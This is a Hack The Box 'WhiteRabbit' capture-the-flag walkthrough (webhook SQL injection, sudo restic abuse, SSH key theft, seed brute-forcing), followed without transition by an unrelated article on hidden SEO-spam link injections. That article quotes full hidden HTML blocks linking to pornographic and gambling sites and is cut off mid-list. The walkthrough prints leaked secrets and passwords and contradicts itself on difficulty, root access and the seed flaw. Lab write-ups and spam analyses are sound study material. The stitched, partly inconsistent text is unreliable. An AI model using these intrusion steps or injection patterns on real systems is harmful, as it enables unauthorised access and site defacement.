Introduction to WhiteRabbit:

In this writeup, we will explore the “WhiteRabbit” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “WhiteRabbit” machine from Hack The Box by achieving the following objectives:

User Flag:

The user flag began with a publicly accessible Uptime Kuma guest dashboard that inadvertently exposed internal service names and subdomains, including Wiki.js, Gophish, and n8n. A leaked n8n workflow JSON file on the unauthenticated Wiki.js instance revealed the exact webhook endpoint, the hardcoded HMAC-SHA256 secret, and a vulnerable email parameter prone to blind SQL injection. This dump uncovered the restic repository password from bob’s command history. Leveraging bob’s NOPASSWD sudo privilege for restic, a snapshot was restored containing bob’s private SSH key from /dev/shm. After gaining access as bob, the same restic privilege was abused again to dump a root-level snapshot that included morpheus’s private SSH key. Finally, SSH access as morpheus allowed reading of the user.txt flag.

Root Flag:

From the morpheus shell, exploration revealed a custom SUID binary at /opt/neo-password-generator/neo-password-generator. The binary was transferred off-box and reverse-engineered, exposing a predictable pseudorandom password generator that used srand() seeded directly from a command-line argument. A signed integer overflow in the seed calculation (1725028842 * 1000 + add) created a small, predictable negative seed space. The binary was faithfully recreated locally, and a brute-force script generated candidate passwords until a valid one was found, granting SSH access as neo. Once inside as neo, sudo -l revealed full passwordless sudo privileges ((ALL : ALL) ALL). A simple sudo su elevated to root, allowing direct access to root.txt and completing the box.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.63

nmap -sC -sV -oA initial 10.10.11.63

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/whiterabbit]
└──╼ $nmap -sC -sV -oA initial 10.10.11.63
# Nmap 7.94SVN scan initiated Fri Dec 12 13:57:59 2025 as: nmap -sC -sV -oA initial 10.10.11.63
Nmap scan report for 10.10.11.63
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
|_  256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
80/tcp   open  http    Caddy httpd
|_http-title: Did not follow redirect to http://whiterabbit.htb
|_http-server-header: Caddy
2222/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
|_  256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 12 13:58:09 2025 -- 1 IP address (1 host up) scanned in 10.19 seconds
 

┌─[dark@parrot]─[~/Documents/htb/whiterabbit]
└──╼ $nmap -sC -sV -oA initial 10.10.11.63
# Nmap 7.94SVN scan initiated Fri Dec 12 13:57:59 2025 as: nmap -sC -sV -oA initial 10.10.11.63
Nmap scan report for 10.10.11.63
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
|_  256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
80/tcp   open  http    Caddy httpd
|_http-title: Did not follow redirect to http://whiterabbit.htb
|_http-server-header: Caddy
2222/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
|_  256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 12 13:58:09 2025 -- 1 IP address (1 host up) scanned in 10.19 seconds
 

Analysis:

• 22/tcp (SSH): Standard OpenSSH service on Ubuntu, likely requiring valid credentials for remote access.
• 80/tcp (HTTP): Caddy web server redirecting to whiterabbit.htb, indicating name-based virtual hosting.
• 2222/tcp (SSH): Secondary OpenSSH instance on a non-standard port, suggesting an alternate or restricted access path.
  

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

Visiting http://whiterabbit.htb, we’re presented with the public landing page of “White Rabbit – Pentesting Services”, a professional marketing site featuring a stylised rabbit mascot and sections about their penetration testing offerings.

Browsing the “Latest News” section on the main whiterabbit.htb site, we see a blog-style update explicitly mentioning the use of Uptime Kuma for uptime and network monitoring during client pentesting engagements, directly confirming its deployment.

Running Gobuster in VHOST enumeration mode against whiterabbit.htb using a medium-sized subdomain wordlist, the tool completes its scan with nearly 5,000 entries tested and reports no additional virtual hosts discovered.

Executing ffuf with Host-header fuzzing (Host: FUZZ.whiterabbit.htb) and filtering for non-zero response sizes, we successfully identify a hidden virtual host that returns a 302 redirect

Initial Web Exposure via Uptime Kuma

Accessing http://status.whiterabbit.htb/dashboard displays the Uptime Kuma login page with a standard username/password form and a “Remember me” option.

Uptime Kuma – Open-Source Uptime Monitoring

Uptime Kuma is a self-hosted, open-source monitoring tool that tracks the uptime and performance of websites, servers, and online services. It provides a real-time web dashboard, historical statistics, and alerts via channels like email, Discord, or Slack when services go down. Supporting multiple protocols such as HTTP(S), TCP, and Ping, it lets users monitor critical systems without relying on third-party services, giving full control over their data and notifications.

Viewing the source of http://status.whiterabbit.htb/dashboard, we see the standard Uptime Kuma login page source, featuring typical meta tags, Vue.js bundles, and the characteristic “Uptime Kuma/title” noscript message prompting JavaScript enablement.

When you visit https://n8n.io (as the status page monitoring reveals), you see the official landing page for n8n, a fair-code workflow automation platform that White Rabbit runs in production.

Discover the uptime version

Inspecting the bundled JavaScript at /assets/index-CYsZUV7d.js, we quickly spot the hardcoded frontendVersion string returning “1.23.13”

The official Uptime Kuma public status page provides real-time visibility into the operational state of monitored systems. It displays uptime metrics, incident history, and performance data, allowing stakeholders to quickly assess service health and track any disruptions without requiring authentication.

Trying /status at http://status.whiterabbit.htb/status returns a blank page, but based on the Uptime Kuma demo, it’s probably a general status endpoint.

Discovery of Internal Services

An unauthenticated Uptime Kuma page at /status/temp publicly lists all monitored services as operational.

Wiki.js Information Disclosure

When you land on http://a668910b5514e.whiterabbit.htb, Wiki.js greets you with its clean, modern homepage. A visible “ToDo” page lists just one item: the staff still needs to add authentication.

When you visit http://ddb09a8558c9.whiterabbit.htb, Gophish welcomes you with its clean login page. This open-source phishing framework displays only the iconic fishing-hook logo and a straightforward “Username / Password” sign-in form.

GoPhish Webhooks workflow

An internal Wiki.js article at /gophish_webhooks documents Gophish–n8n workflows, including screenshots and the full exported JSON.

Diving deeper into the leaked workflow notes, we read the full explanation of signature processing, user validation, phishing-score updates, and the existence of a debug node clearly labelled “DEBUG: REMOVE SOON”.

The exported n8n documentation includes a legitimate Gophish POST example with the required signature header and a “Clicked Link” payload.

When you save the leaked n8n workflow locally, the suggested filename “gophish_to_phishing_score_database.json” immediately reveals its purpose.

n8n Webhook Authentication Bypass

Visiting the n8n instance at http://28efa87fdf.whiterabbit.htb, we’re presented with the standard n8n login screen prompting for email and password, along with a “Critical update available” banner.

When you attempt to call the raw webhook URL directly at /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfdid, n8n returns a 404 JSON response.

SQL Injection via Signed Webhook

Sending a raw GET request to the same webhook path returns another 404 with the same helpful error message and a hint to activate the workflow via the top-right toggle.

The replayed webhook returned 200 OK with “User is not in database,” indicating an active endpoint that rejected the test payload.

The exported workflow includes “no signature” and “invalid signature” branches that expose plain-text errors for missing or incorrect x-gophish-signature headers.

A leaked n8n workflow node exposes a hard‑coded SHA‑256 HMAC secret for Gophish webhook signing.

Generating an HMAC-SHA256 Signature from a Minified JSON Payload Using CyberChef

Using CyberChef, we generate the correct HMAC-SHA256 by signing the minified JSON body with the UTF-8 secret jBiTicmv7gxc6IS. This produces the signature 2db3eee889e9ee285ce57acbe51caae7dd4863ab9cadf21be4262be8f9fb5ff7.

The finalised payload includes the correct secret, minified JSON, and a valid HMAC, enabling data extraction or command execution via OUTFILE.

Testing Request Integrity with Burp Suite

We craft the first request in Burp using the original payload and an incorrect signature. The server returns the expected “Provided signature is not valid” response.

We used CyberChef to recreate the minified JSON and compute a valid HMAC for the malicious payload.

A basic SQLi in the email field using ExtractValue returned a partial database list via an error message.

When you send the fully signed SQL injection request, the server responds with another detailed MySQL error.

We send a signed SQL injection payload to the n8n webhook. This triggers an XPath error that leaks all table names in the phishing database, including victims and campaigns. The still-active Gophish → n8n → MySQL chain confirms full blind SQLi exploitation with valid HMAC authentication.

We execute the final signed payload to extract full command history entries. These include usernames and timestamps, retrieved through the still-active n8n webhook → MySQL injection chain.

Opening the sql.py exploit script reveals a clean, fully automated Python tool. It loops 1,500 times to blind-extract the entire temp.command_log table, including IDs, commands, and dates.

Running the python3 sql.py script, we observe it quickly cycling through timestamps from August 30, 2024. It appears to be enumerating entries from the leaked temp.command_log table.

Credential Discovery from Command Logs

On Parrot OS, we install Restic with sudo apt install restic, fetching the latest version from the official repository. It is now ready to interact with White Rabbit’s backup system.

Attempting to use Restic without proper configuration results in a fatal error. It cannot reach http://75951e6ff.whiterabbit.htb/config, confirming the backup server runs on that subdomain.

To authenticate with the Restic repository, we create a password file containing ygcsvcuMdfZ89yaRL1TKhe5jAmth7vvxw and set its permissions to 600. We then export the RESTIC_REPOSITORY and RESTIC_PASSWORD_FILE environment variables.

Running restic snapshots, we confirm a single snapshot exists: ID 272cad5 from 2025-03-06, tagged with the path /dev/shm/bob/ssh.

Lateral Movement to bob

Using restic restore latest, we authenticated and restored snapshot 272cad5 from /dev/shm/bob/ssh on the remote repository.

Landing inside the restored snapshot, we find ourselves in /home/dark/Documents/htb/whiterabbit/restored_data/dev/shm/bob/ssh – a clear sign we’ve successfully recovered bob’s SSH directory from a restic backup.

Landing in the restored snapshot directory, we see a single file: bob.7z – the compressed archive containing bob’s SSH credentials that was accidentally left in /dev/shm.

Recovering Credentials from the 7-Zip Archive

Attempting to crack the 7z archive with 7zzjohn, we hit the classic “Can’t locate Compress::Raw::Lzma” error** because the required Perl module is missing on Parrot OS.

We install the missing LZMA Perl module with sudo apt install libcompress-raw-lzma-perl, fixing 7zz for John and allowing clean hash extraction.

We used 7zz john to crack the 7z, extracted the contents, and saved Bob’s password hash to hash.txt.

Finally, we dumped the cracked hash and viewed it with cat hash.txt, revealing Bob’s full password hash: $7z$.... Strictly unnecessary at this point, but satisfying to confirm.

John The Ripper quickly identifies the password as lq2w3e4r5t6y (a common keyboard-walk pattern shifted down one row, present in rockyou).

Inspecting Contents of bob.7z

Extracting the 7z archive with 7z x, we successfully decompress bob.7z after providing the password, revealing bob’s private key and config files.

Listing the restored directory post-extraction, we now have bob, bob.7z, bob.pub, config, and hash.txt – everything we need to own the box.

Pivoting to bob over SSH

Fixing permissions and SSHing directly as bob, we run chmod 600 bob and ssh -i bob bob@10.10.11.63 – instant shell, no password needed.

Checking bob’s sudo privileges, we run sudo -l and discover bob can run /usr/bin/restic as root with NOPASSWD – the golden ticket for privilege escalation.

Successfully initializing bob’s own local restic repository, we create dark at f22eeb5f29 after providing a valid password, ready for our own backups.

Running restic backup /root as bob with full sudo privileges, we create a new snapshot 2c446829 of the entire root directory – adding 4 new files and 3 new directories (including /root/morpheus and its keys) to our personal repository dark, all without ever needing root’s password.

Listing the latest snapshot 2c446829 as bob, we see a full backup of /root including .bashrc, .profile, .ssh, and crucially /root/morpheus and /root/morpheus.pub.

Dumping morpheus’s private key from the root snapshot, we use restic dump on path /root/morpheus and extract the full OpenSSH private key – confirming we now own root.

Pivot to morpheus

Viewing the recovered Morpheus private key locally, we can morpheus and stare at a pristine OpenSSH private key – root access is now just an SSH away.

SSHing in as morpheus using the recovered key, we successfully authenticate to morpheus@10.10.11.63 and land directly on the minimized Ubuntu 24.04 system.

Landing the final blow as morpheus on WhiteRabbit, we run cat user.txt and reveal the user flag

Escalate to Root Privileges Access

Privilege Escalation:

Failing sudo as morpheus, we repeatedly get “Sorry, try again” – confirming no easy password reuse and forcing us to look deeper for privilege escalation.

SUID Binary Discovery

Exploring /opt as morpheus, we discover the neo-password-generator directory containing a single executable – clearly the SUID binary we’re hunting.

Reverse Engineering the Binary

SCP-ing the neo-password-generator binary back to our machine, we successfully pull the 15KB ELF for static and dynamic analysis.

Checking the file type of neo-password-generator, we confirm it’s a 64-bit LSB pie executable, dynamically linked, not stripped – perfect for reverse engineering.

PRNG Design Analysis

Vulnerability 1: Integer Truncation in Seed Calculation (Critical Exploit Path)

The seed is calculated as tv_sec * 1000 + tv_usec / 1000, producing a 64-bit millisecond timestamp (approximately 1.7 trillion in late 2025). While this value fits safely within a signed 64-bit integer, it is commonly truncated when passed to srand(), either by casting to a 32-bit unsigned integer or via a modulo operation. This truncation silently discards the higher bits, reducing the effective seed space from trillions of possibilities to at most 4.29 billion, and often far fewer in practice. As a result, what appears to be a large entropy source becomes a manageable brute-force space, making this the primary exploitation vector.

Vulnerability 2: Predictable Seed from Low-Entropy Source

The seed relies entirely on the current system time in milliseconds, which provides very little entropy. An attacker with approximate knowledge of when the program was executed—derived from logs, challenge timing, or user interaction—can constrain the search window to a narrow range such as ±10–60 seconds. This reduces the number of candidate seeds to roughly 20,000–120,000. Because PRNGs are deterministic, testing this limited range is sufficient to reliably reproduce the generated output.

Vulnerability 3: Use of Weak, Non-Cryptographic PRNG

The password generation uses the standard rand() function seeded via srand(), which is not designed for security purposes. It exhibits predictable output patterns, weak lower bits, and easily reproducible sequences. Even if seeded correctly, rand() remains unsuitable for password generation. Combined with the truncated and time-based seed, an attacker can replicate the algorithm and regenerate the password with minimal effort, fully compromising the mechanism.

Grepping /etc/passwd for shell users, we spot root, neo (UID/GID 1000), and morpheus (UID/GID 1001) – hinting neo might be the intended escalation target.

Viewing the full decompiled dark.c source, we see a predictable password generator using srand(param_1) and rand() % 62 over a fixed charset, seeded directly from the command-line argument.

Running gcc on the decompiled dark.c, we hit an integer overflow warning on the line generate_password(1725028842*1000 + add) – a classic seed manipulation hint.

Executing our reconstructed dark binary, we successfully generate a password like L70f2aFEohexXuk07tEw… – proving our reverse engineering is accurate and ready for seed brute-force.

Dumping our local dark binary output to pass.txt, we prepare the reconstructed neo-password-generator for transfer and analysis. Spotting the overflow in the seed calculation, we realize 1725028842 * 1000 overflows a signed int, giving us a predictable negative seed range to brute-force neo’s password.

Authentication as neo

Testing multiple generated passwords via ssh, we see a long list of failed Paramiko errors until the correct one grants “Linux – Shell access!”.

Successfully authenticating as neo, we bypass the banner errors and gain a stable shell on neo@10.10.11.63.

Running sudo -l as neo, we discover the nuclear option: (ALL : ALL) ALL – neo can execute any command as any user, including root, without a password.

Switching to root with plain sudo su as neo, we seamlessly become root at /home/neo# – confirming neo has unrestricted sudo access.

Escalating instantly as neo with sudo -s, we drop straight into a root shell at /home/neo# – no password needed.

Catting root.txt from neo’s home as root, we uncover the root flag

The post Hack The Box: WhiteRabbit Machine Walkthough – Insane Difficulity appeared first on Threatninja.net.

When analyzing the content of websites in an attempt to determine what category it belongs to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer or online flower shop, or, say, a law firm website, with completely neutral content, but our solutions would place it squarely in the “Adult content” category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine’s page analysis log clears it up.

Invisible HTML block, or SEO spam

The website falls into the questionable category because it contains an HTML block with links to third-party sites, invisible to regular users. These sites typically host content of a certain kind – which, in our experience, is most often pornographic or gambling materials – and in the hidden block, you will find relevant keywords along with the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although there are many techniques that attackers use to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.

Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked due to being categorized as prohibited, a sign that something is wrong with them. Our engine detects both links and their descriptions that are present in a block like that.

How hidden links work

Hyperlinks that are invisible to regular users but still can be scanned by various analytical systems, such as search engines or our web categorization engine, are known as “hidden links”. They are often used for scams, inflating website rankings (positions in search results), or pushing down the ranking of a victim website.

To understand how this works, let us look at how today’s SEO functions in the first place. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest and most relevant one to this article is known as PageRank. The PageRank metric, or weight in the context of this algorithm, is a numerical value that determines the importance of a specific page. The higher the number of links from other websites pointing to a page, and the greater those websites’ own weights, the higher the page’s PageRank.

So, to boost their own website’s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website’s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.

However, PageRank is no longer the only method search engines use to measure a website’s value. Google, for example, also applies other algorithms, such as the artificial intelligence-based RankBrain or the BERT language model. These algorithms use more sophisticated metrics, such as Domain Authority (that is, how much authority the website has on the subject the user is asking about), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but this tactic has a severely limited effect due to advanced algorithms and filters aimed at demoting sites that break the search engine’s rules. Examples of these filters are as follows:

• Google Penguin, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.
• Google Panda, which evaluates content quality. If the website has a high PageRank, but the content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.
• Google SpamBrain, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.

What a Black Hat SEO block looks like in a page’s HTML markup

Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which these blocks can be identified.

Example 1

<div style="display: none;">
افلام سكس اعتصاب <a href="https://www.azcorts.com/" rel="dofollow" target="_self">azcorts.com</a> قنوات جنسية
free indian porn com <a href="https://porngun.mobi" target="_self">porngun.mobi</a> xharmaster
石原莉紅 <a href="https://javclips.mobi/" target="_blank" title="javclips.mobi">javclips.mobi</a> ちっぱい
bank porn <a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn">pimpmpegs.net</a> wwwporm
salamat lyrics tagalog <a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro">teleseryeone.com</a> play desi
</div>
<div style="display: none;">
كسى بيوجعنى <a href="https://www.sexdejt.org/" rel="dofollow">sexdejt.org</a> سكس سانى
indian sex video bp <a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com">directorio-porno.com</a> xvideos indian pussy
swara bhaskar porn <a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq">greenporn.mobi</a> kannada sexy video
bp sex full <a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video">tubepornmix.info</a> lily sex
pinayflix pamasahe <a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank">gmateleserye.com</a> family feud november 17
</div>
<div style="display: none;">
sunny leone ki bp download <a href="https://eroebony.info" target="_self" title="eroebony.info">eroebony.info</a> hansika xvideos
موقع سكس ايطالى <a href="https://bibshe.com/" target="_self" title="bibshe.com سكس العادة السرية">bibshe.com</a> صور احلى كس
raja rani coupon result <a href="https://booketube.mobi" rel="dofollow">booketube.mobi</a> exercise sex videos
indianbadwap <a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn">likeporn.mobi</a> rabi pirzada nude video
marathi porn vidio <a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz">rajwap.biz</a> www.livesex.com
</div>

Another sign of Black Hat SEO in the example is the attribute rel="dofollow". This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use rel="nofollow", which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.

Thus, the combination of a hidden block ( display: none;) and a set of external pornographic (in this instance) links with the rel="dofollow" attribute unequivocally point to a SEO spam injection.

Note that all <div> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.

Example 2

<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس انجليز <a href="https://wfporn.com/" target="_self" title="wfporn.com افلام سحاق مترجم">wfporn.com</a> سكس كلاسيك مترجم</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">فيلم سكس <a href="https://www.keep-porn.com/" rel="dofollow" target="_blank">keep-porn.com</a> سكس هندى اغتصاب</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">desi nude tumbler <a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video">desixxxv.net</a> kanpur sexy video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">www wap sex video com <a href="https://pornorado.mobi" target="_self">pornorado.mobi</a> sexy film video mp4</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">mom yes porn please <a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net">movsmo.net</a> yes porn please brazzers</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xxx download hd <a href="https://fuxee.mobi" title="fuxee.mobi">fuxee.mobi</a> fat woman sex</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">bangalore xxx <a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com">bigassporntrends.com</a> sexy video kashmir</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xnxx sister sex <a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming">wetwap.info</a> blue film a video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">tamilschoolsexvideo <a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi">tubetria.mobi</a> sex free videos</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس من اجل المال مترجم <a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد لحس الكس">yesexyporn.com</a> نسوان شرميط</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">kamapishi <a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online">desisexy.org</a> savita bhabhi xvideo</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">aflamk2 <a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net">pornvideoswatch.net</a> نيك ثمينات</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">hentaifox futanari <a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame">hentaitale.net</a> hen hentai</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">video sexy wallpaper <a href="https://povporntrends.com" target="_blank">povporntrends.com</a> bengolibf</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">persona 5 hentai manga <a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai">younghentai.net</a> toys hentai</div>

Let us analyze the set of CSS styles: <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">. The properties position: absolute; height: 0pt; width: 0pt; remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the DOM (document object model). That’s why HTML code scanning systems, such as search engines, are able to see it.

In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute rel="dofollow", as well as many links to pornographic websites with relevant keywords.

The combination of styles that sets the block dimensions to zero is less obvious than display: none; because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:

<script src="files/layout/js/slider3d.js?v=0d6651e2"></script><script src="files/layout/js/layout.js?v=51a52ad1"></script>
<style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar {  display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}</style>
<div class="ads-gold">
Ganhe Rápido nos Jogos Populares do Cassino Online <a href="https://580-bet.com" target="_blank">580bet</a>
Cassino <a href="https://bet-7k.com" target="_blank">bet 7k</a>: Diversão e Grandes Vitórias Esperam por Você
Aposte e Vença no Cassino <a href="https://leao-88.com" target="_blank">leao</a> – Jogos Fáceis e Populares
Jogos Populares e Grandes Prêmios no Cassino Online <a href="https://luck-2.com" target="_blank">luck 2</a>
Descubra os Jogos Mais Populares no Cassino <a href="https://john-bet.com" target="_blank">john bet</a> e Ganhe
<a href="https://7755-bet.com" target="_blank">7755 bet</a>: Apostas Fáceis, Grandes Oportunidades de Vitória
Jogue no Cassino Online <a href="https://cbet-88.com" target="_blank">cbet</a> e Aumente suas Chances de Ganhar
Ganhe Prêmios Incríveis com Jogos Populares no Cassino <a href="https://bet7-88.com" target="_blank">bet7</a>
Cassino <a href="https://pk55-88.com" target="_blank">pk55</a>: Onde a Sorte Está ao Seu Lado
Experimente o Cassino <a href="https://8800-bet.com" target="_blank">8800 bet</a> e Ganhe com Jogos Populares
Ganhe Facilmente no Cassino Online <a href="https://doce-88.com" target="_blank">doce</a>
Aposte e Vença no Cassino <a href="https://bet-4-br.com" target="_blank">bet 4</a>
Jogos Populares e Grandes Premiações na <a href="https://f12--bet.com" target="_blank">f12bet</a>
Descubra a Diversão e Vitória no Cassino <a href="https://bet-7-br.com" target="_blank">bet7</a>
Aposte nos Jogos Mais Populares do Cassino <a href="https://ggbet-88.com" target="_blank">ggbet</a>
Ganhe Prêmios Rápidos no Cassino Online <a href="https://bet77-88.com" target="_blank">bet77</a>
Jogos Fáceis e Rápidos no Cassino <a href="https://mrbet-88.com" target="_blank">mrbet</a>
Jogue e Ganhe com Facilidade no Cassino <a href="https://bet61-88.com" target="_blank">bet61</a>
Cassino <a href="https://tvbet-88.com" target="_blank">tvbet</a>: Onde a Sorte Está Ao Seu Lado
Aposte nos Melhores Jogos do Cassino Online <a href="https://pgwin-88.com" target="_blank">pgwin</a>
Ganhe Grande no Cassino <a href="https://today-88.com" target="_blank">today</a> com Jogos Populares
Cassino <a href="https://fuwin-88.com" target="_blank">fuwin</a>: Grandes Vitórias Esperam por Você
Experimente os Melhores Jogos no Cassino <a href="https://brwin-88.com" target="_blank">brwin</a>
</div></body>

Aside from the parameters we are already familiar with, which are responsible for concealing a block ( height: 0px, color: transparent, overflow: hidden), and the name that hints at its contents ( \<style type="text/css"\>.ads-gold), strings with scripts in this example can be found at the very beginning: <script src="files/layout/js/slider3d.js?v=0d6651e2"></script> and <script src="files/layout/js/layout.js?v=51a52ad1"></script>. These indicate that external JavaScript can dynamically control the page content, for example, by adding or changing hidden links, that is, modifying this block in real time.

This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.

Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:

• the parameter visibility: hidden; can sometimes be seen instead of display: none;.
• Within position: absolute;, the block with hidden links may not have a zero size, but rather be located far beyond the visible area of the page. This can be set, for example, via the property left: -9232px;, as in the example below.

<div style="position: absolute; left: -9232px">
<a href="https://romabet.cam/">روما بت</a><br>
<a href="https://mahbet.cam/">ماه بت</a><br>
<a href="https://pinbahis.com.co/">پین باهیس</a><br>
<a href="https://bettingmagazine.org/">بهترین سایت شرط بندی</a><br>
<a href="https://1betcart.com/">بت کارت</a><br>
<a href="https:// yasbet.com.co/">یاس بت</a><br>
<a href="https://yekbet.cam/">یک بت</a><br>
<a href="https://megapari.cam/">مگاپاری </a><br>
<a href="https://onjabet.net/">اونجا بت</a><br>
<a href="https://alvinbet.org/">alvinbet.org</a><br>
<a href="https://2betboro.com/">بت برو</a><br>
<a href="https://betfa.cam/">بت فا</a><br>
<a href="https://betforward.help/">بت فوروارد</a><br>
<a href="https://1xbete.org/">وان ایکس بت</a><br>
<a href="https://1win-giris.com.co/">1win giriş</a><br>
<a href="https://betwiner.org/">بت وینر</a><br>
<a href="https://4shart.com/">بهترین سایت شرط بندی ایرانی</a><br>
<a href="https://1xbetgiris.cam">1xbet giriş</a><br>
<a href="https://1kickbet1.com/">وان کیک بت</a><br>
<a href="https://winbet-bet.com/">وین بت</a><br>
<a href="https://ritzobet.org/">ریتزو بت</a><br>

How attackers place hidden links on other people’s websites

To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider’s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator’s credentials.

Let us examine in detail the various mechanisms through which an attacker gains access to editing a page’s HTML code.

• Compromise of the administrator password. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.
  After gaining access to the admin panel, the attacker can directly edit the page’s HTML code or install their own plugins with hidden SEO blocks.
